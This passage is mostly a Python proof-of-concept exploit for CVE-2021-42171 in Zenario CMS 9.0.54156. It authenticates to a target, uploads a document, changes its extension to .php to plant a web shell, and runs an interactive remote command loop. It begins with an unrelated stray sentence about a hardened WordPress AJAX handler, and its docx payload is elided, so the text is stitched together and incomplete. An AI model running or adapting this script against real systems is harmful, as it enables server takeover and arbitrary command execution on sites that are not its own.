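With the hardened handler, the PoC request fails at check_ajax_referer() (no nonce) before any capability or sanitisation logic runs, and a request that carries a valid nonce but comes from a subscriber is refused with 403.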
-
Zenario CMS 9.0.54156 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: Zenario CMS 9.0.54156 - Remote Code Execution (RCE) (Authenticated)
# Date: 04/02/2022
# Exploit Author: minhnq22
# Vendor Homepage: https://zenar.io/
# Software Link: https://zenar.io/download-page
# Version: 9.0.54156
# Tested on: Ubuntu 21.04
# CVE : CVE-2021-42171
# Python3

import os
import sys
import json
import uuid
import base64
import requests

# Input
if len(sys.argv) != 4:
    print("Usage: " + sys.argv[0] + " 'http(s)://TARGET/zenario' 'USERNAME' 'PASSWORD'")
    sys.exit(1)

TARGET = sys.argv[1]
USERNAME = sys.argv[2]
PASSWORD = sys.argv[3]

## Attempt to log in
### Get cookie
resp = requests.get(TARGET + "/zenario/admin/welcome.ajax.php?task=&get=%5B%5D")
### Grab the PHP session ID
PHPSESSID = resp.headers['Set-Cookie'].split(";")[0]
### Authenticate with cookie
resp = requests.post(TARGET + "/zenario/admin/welcome.ajax.php?task=&get=%5B%5D",
                     headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID},
                     data={"_validate": "true",
                           "_box": '{"tab":"login","tabs":{"login":{"edit_mode":{"on":1},"fields":{"reset":{"_was_hidden_before":true},"description":{},"username":{"current_value":"' + USERNAME + '"},"password":{"current_value":"' + PASSWORD + '"},"admin_login_captcha":{"_was_hidden_before":true,"current_value":""},"remember_me":{"current_value":false},"login":{"pressed":true},"forgot":{"pressed":false},"previous":{"pressed":false}}},"forgot":{"edit_mode":{"on":1},"fields":{"description":{},"email":{"current_value":""},"previous":{},"reset":{}}}},"path":"login"}'})
# If login OK
print("Login OK!")

## Upload web shell
### Get sync info
resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_upload",
                     headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID,
                              "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},
                     data={"_fill": "true", "_values": ""})
resp_body = json.loads(resp.text)
password_sync = resp_body["_sync"]["password"]
iv_sync = resp_body["_sync"]["iv"]
cache_dir_sync = resp_body["_sync"]["cache_dir"]

### Create blank docx file
# base64 of the .docx used by the original post (multi-kilobyte blob omitted)
file_content = b"..."
file_name = uuid.uuid4().hex
file = open(file_name + ".docx", "wb")
file.write(base64.decodebytes(file_content))
file.close()

### Upload docx file
resp = requests.post(TARGET + "/zenario/ajax.php?method_call=handleAdminBoxAJAX&path=zenario_document_upload",
                     headers={"Cookie": PHPSESSID,
                              "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},
                     data={"id": "", "fileUpload": 1},
                     files={"Filedata": open(file_name + ".docx", "rb")})
### Get sync id file
resp_body = json.loads(resp.text)
id_sync = resp_body["id"]

# Update database
resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_upload",
                     headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID,
                              "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},
                     data={"_save": "true", "_confirm": "",
                           "_box": '{"tabs":{"upload_document":{"edit_mode":{"on":1},"fields":{"document__upload":{"current_value":"' + id_sync + '"},"privacy":{"_display_value":false,"current_value":"public"}}}},"_sync":{"cache_dir":"' + cache_dir_sync + '","password":"' + password_sync + '","iv":"' + iv_sync + '","session":false},"tab":"upload_document"}'})
# If upload OK
print("Upload file OK!")

## Change file extension
### Search ID file in Database
resp = requests.get(TARGET + "/zenario/admin/organizer.ajax.php?path=zenario__content/panels/documents&_sort_col=ordinal&_search=" + file_name,
                    headers={"Cookie": PHPSESSID})
resp_body = json.loads(resp.text)
file_id = resp_body["__item_sort_order__"]["0"]
### Get sync info
resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_properties&id=" + str(file_id),
                     headers={"Cookie": PHPSESSID,
                              "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},
                     data={"_fill": "true", "_values": ""})
resp_body = json.loads(resp.text)
password_sync = resp_body["_sync"]["password"]
iv_sync = resp_body["_sync"]["iv"]
cache_dir_sync = resp_body["_sync"]["cache_dir"]
### Change to .php
resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_properties&id=" + str(file_id),
                     headers={"Cookie": PHPSESSID,
                              "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},
                     data={"_save": "true", "_confirm": "",
                           "_box": '{"tabs":{"details":{"edit_mode":{"on":1},"fields":{"document_extension":{"_was_hidden_before":true,"current_value":"php"},"document_title":{"current_value":""},"document_name":{"current_value":"' + file_name + '"},"checksum":{"_was_hidden_before":true,"current_value":"y8vuS"},"date_uploaded":{"current_value":"2021-09-2920173A213A31"},"privacy":{"_display_value":"Public","current_value":"public"},"tags":{"_display_value":false,"current_value":""},"link_to_add_tags":{}}},"upload_image":{"edit_mode":{"on":true},"fields":{"thumbnail_grouping":{},"title":{"current_value":""},"thumbnail_image":{},"delete_thumbnail_image":{},"zenario_common_feature__upload":{"current_value":""}}},"extract":{"edit_mode":{"on":0},"fields":{"extract":{"current_value":"No20plain-text20extract"},"extract_wordcount":{"current_value":0}}}},"_sync":{"cache_dir":"' + cache_dir_sync + '","password":"' + password_sync + '","iv":"' + iv_sync + '","session":false},"tab":"details"}'})

## Get public URL webshell
resp = requests.post(TARGET + "/zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX",
                     headers={"Cookie": PHPSESSID,
                              "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},
                     data={"id": file_id, "generate_public_link": 1})
response_body = resp.text
# file_name is a 32-char hex uuid, so +36 covers "<file_name>.php"
web_shell_url = response_body[response_body.find("http"): response_body.find(file_name) + 36]
# If web shell OK
print("Web shell is available!")
print("URL:", web_shell_url)
print("Enter command.")

## Execute command
cmd = ''
while cmd != "exit":
    ### Get command
    cmd = input("> ")
    ### Get result
    resp = requests.post(web_shell_url, data={"cmd": cmd})
    response_body = resp.text
    result = response_body[response_body.find("8d589afa4dfaeeed85fff5aa78e5ff6a") + 32: response_body.find("7f021a1415b86f2d013b2618fb31ae53")]
    print(result)

## Delete web shell
resp = requests.post(TARGET + "/zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX",
                     headers={"Cookie": PHPSESSID,
                              "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},
                     data={"id": file_id, "delete": 1})
print("Web shell is deleted!")
# Delete docx file
os.remove(file_name + ".docx")
print("Docx file is deleted!")